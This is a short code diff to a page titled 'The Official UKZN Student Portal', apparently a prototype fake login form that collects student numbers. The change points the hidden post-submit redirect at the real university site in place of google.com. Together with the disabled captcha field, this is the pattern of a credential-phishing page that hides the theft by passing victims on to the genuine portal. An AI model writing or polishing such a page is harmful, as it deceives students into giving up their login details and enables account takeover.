--- a/prototype2.html
+++ b/prototype2.html
@@ -21,7 +21,7 @@
     <label class ="the-first-text">"The Official UKZN Student Portal"</label>
     <label class="long-bar-text">Secure Student Login</label>
     <input type="hidden" name="_captcha" value="false">
-    <input type="hidden" name="_next" value="https://google.com">
+    <input type="hidden" name="_next" value="https://sc.ukzn.ac.za">
     <label for="student-number" name="student-number" class="student-number">Student Number</label>
     <label class="student-number-text"></label >
     <input type="text" class="student-number-value" name="studentNumber" hidden>
